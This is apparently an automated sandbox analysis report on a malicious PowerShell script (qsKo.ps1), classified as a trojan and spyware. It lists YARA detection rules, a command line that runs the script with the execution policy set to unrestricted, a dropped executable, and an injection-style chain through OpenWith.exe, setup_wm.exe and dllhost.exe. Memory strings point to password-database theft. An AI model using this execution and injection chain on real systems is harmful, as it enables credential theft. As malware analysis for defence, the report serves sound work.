Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A01F40	8_3_0000021CE7A01F40
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A01F40	8_3_0000021CE7A01F40
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A01F40	8_3_0000021CE7A01F40
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0170E	8_3_0000021CE7A0170E
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0170E	8_3_0000021CE7A0170E
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0170E	8_3_0000021CE7A0170E
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A03660	8_3_0000021CE7A03660
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A03660	8_3_0000021CE7A03660
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A03660	8_3_0000021CE7A03660
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0027B	8_3_0000021CE7A0027B
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0027B	8_3_0000021CE7A0027B
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0027B	8_3_0000021CE7A0027B
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A01F40	8_3_0000021CE7A01F40
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A01F40	8_3_0000021CE7A01F40
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A01F40	8_3_0000021CE7A01F40
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0170E	8_3_0000021CE7A0170E
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0170E	8_3_0000021CE7A0170E
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0170E	8_3_0000021CE7A0170E
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A03660	8_3_0000021CE7A03660
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A03660	8_3_0000021CE7A03660
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A03660	8_3_0000021CE7A03660
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0027B	8_3_0000021CE7A0027B
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0027B	8_3_0000021CE7A0027B
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0027B	8_3_0000021CE7A0027B
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78E2628	8_2_0000021CE78E2628
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F2D24	8_2_0000021CE78F2D24
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78EC25C	8_2_0000021CE78EC25C
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7907684	8_2_0000021CE7907684
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE79155B0	8_2_0000021CE79155B0
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE79195D4	8_2_0000021CE79195D4
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7914DE8	8_2_0000021CE7914DE8
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78FF618	8_2_0000021CE78FF618
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7920D90	8_2_0000021CE7920D90
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78E14D0	8_2_0000021CE78E14D0
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78FDCE4	8_2_0000021CE78FDCE4
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE791ECE4	8_2_0000021CE791ECE4
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7906D18	8_2_0000021CE7906D18
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7926434	8_2_0000021CE7926434
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7910478	8_2_0000021CE7910478
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE791CC00	8_2_0000021CE791CC00
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78FE398	8_2_0000021CE78FE398
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F5ADC	8_2_0000021CE78F5ADC
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7913A38	8_2_0000021CE7913A38
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7923A4D	8_2_0000021CE7923A4D
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7914A50	8_2_0000021CE7914A50
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7920270	8_2_0000021CE7920270
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F7270	8_2_0000021CE78F7270
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE791F1D0	8_2_0000021CE791F1D0
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE791F940	8_2_0000021CE791F940
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7900174	8_2_0000021CE7900174
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE791E984	8_2_0000021CE791E984
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE79148D0	8_2_0000021CE79148D0
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7915918	8_2_0000021CE7915918
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE791A81C	8_2_0000021CE791A81C
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE790D854	8_2_0000021CE790D854
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7920874	8_2_0000021CE7920874
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7907094	8_2_0000021CE7907094
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78FD010	8_2_0000021CE78FD010
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F6F24	8_2_0000021CE78F6F24
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78FC750	8_2_0000021CE78FC750
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7913F70	8_2_0000021CE7913F70
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE79086B4	8_2_0000021CE79086B4
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78FBEB8	8_2_0000021CE78FBEB8
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7903EA4	8_2_0000021CE7903EA4
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE7915EC8	8_2_0000021CE7915EC8
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_00007DF4B99022CC	8_2_00007DF4B99022CC
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4C6E94	9_2_0000022FAA4C6E94
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4C8EB8	9_2_0000022FAA4C8EB8
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4DC668	9_2_0000022FAA4DC668
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4D4660	9_2_0000022FAA4D4660
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4C27A4	9_2_0000022FAA4C27A4
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4CF76C	9_2_0000022FAA4CF76C
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4C9818	9_2_0000022FAA4C9818
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4BBFE4	9_2_0000022FAA4BBFE4
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4BBC68	9_2_0000022FAA4BBC68
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4CE51C	9_2_0000022FAA4CE51C
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4C9D30	9_2_0000022FAA4C9D30
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4CA4F8	9_2_0000022FAA4CA4F8
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4DC500	9_2_0000022FAA4DC500
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4D25B4	9_2_0000022FAA4D25B4
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4CAE10	9_2_0000022FAA4CAE10
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4BC5D4	9_2_0000022FAA4BC5D4
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4B8DF4	9_2_0000022FAA4B8DF4
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4E1E08	9_2_0000022FAA4E1E08
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4BD604	9_2_0000022FAA4BD604
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4D2AA0	9_2_0000022FAA4D2AA0
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4D2254	9_2_0000022FAA4D2254
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4D3B40	9_2_0000022FAA4D3B40
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4C92D4	9_2_0000022FAA4C92D4
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4C53C8	9_2_0000022FAA4C53C8
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4B737C	9_2_0000022FAA4B737C
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4CA860	9_2_0000022FAA4CA860
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4D4144	9_2_0000022FAA4D4144
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4C9998	9_2_0000022FAA4C9998
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4C8980	9_2_0000022FAA4C8980
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4D3210	9_2_0000022FAA4D3210

Source: amsi64_7316.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7316, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: nUCp.mp3.0.dr

Static PE information: Section: UPX1 ZLIB complexity 0.9950352536848073

Source: 6.3.OpenWith.exe.11f7b45d970.4.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 6.3.OpenWith.exe.11f7b45d970.0.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 6.3.OpenWith.exe.11f7b45d970.2.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 6.3.OpenWith.exe.11f7b45d970.1.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload
Source: 6.3.OpenWith.exe.11f7b45d970.5.raw.unpack, CallWrapper.cs	Suspicious method names: .CallWrapper.GetPayload

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@14/7@2/2

Source: C:\Windows\System32\OpenWith.exe

Code function: 6_3_00007DF46E4B2634 CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,SuspendThread,

6_3_00007DF46E4B2634

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Documents\nUCp.mp3

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\SysWOW64\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m051kwi2.pse.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\OpenWith.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\OpenWith.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: OpenWith.exe, 00000006.00000003.1766778822.00007DF46E5B2000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1764862654.0000011F7B2C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1510500387.0000011F7ABE3000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 00000006.00000003.1766778822.00007DF46E5B2000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1764862654.0000011F7B2C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1510500387.0000011F7ABE3000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 00000006.00000003.1766778822.00007DF46E5B2000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1764862654.0000011F7B2C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1510500387.0000011F7ABE3000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 00000006.00000003.1766778822.00007DF46E5B2000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1764862654.0000011F7B2C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1510500387.0000011F7ABE3000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 00000006.00000003.1766778822.00007DF46E5B2000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1764862654.0000011F7B2C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1510500387.0000011F7ABE3000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 00000006.00000003.1766778822.00007DF46E5B2000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1764862654.0000011F7B2C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1510500387.0000011F7ABE3000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 00000006.00000003.1542391088.0000011F7B74E000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1544938979.0000011F7B521000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1542498034.0000011F7B75D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1544938979.0000011F7B4FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 00000006.00000003.1766778822.00007DF46E5B2000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1764862654.0000011F7B2C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1510500387.0000011F7ABE3000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: qsKo.ps1	ReversingLabs: Detection: 21%
Source: qsKo.ps1	Virustotal: Detection: 19%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qsKo.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\system32\conhost.exe" C:\Users\Public\Documents\nUCp.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\Public\Documents\nUCp.exe C:\Users\Public\Documents\nUCp.exe
Source: C:\Users\Public\Documents\nUCp.exe	Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\SysWOW64\OpenWith.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Program Files\Windows Media Player\setup_wm.exe "C:\Program Files\Windows Media Player\setup_wm.exe"
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\system32\conhost.exe" C:\Users\Public\Documents\nUCp.exe	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\Public\Documents\nUCp.exe C:\Users\Public\Documents\nUCp.exe	Jump to behavior
Source: C:\Users\Public\Documents\nUCp.exe	Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Program Files\Windows Media Player\setup_wm.exe "C:\Program Files\Windows Media Player\setup_wm.exe"	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
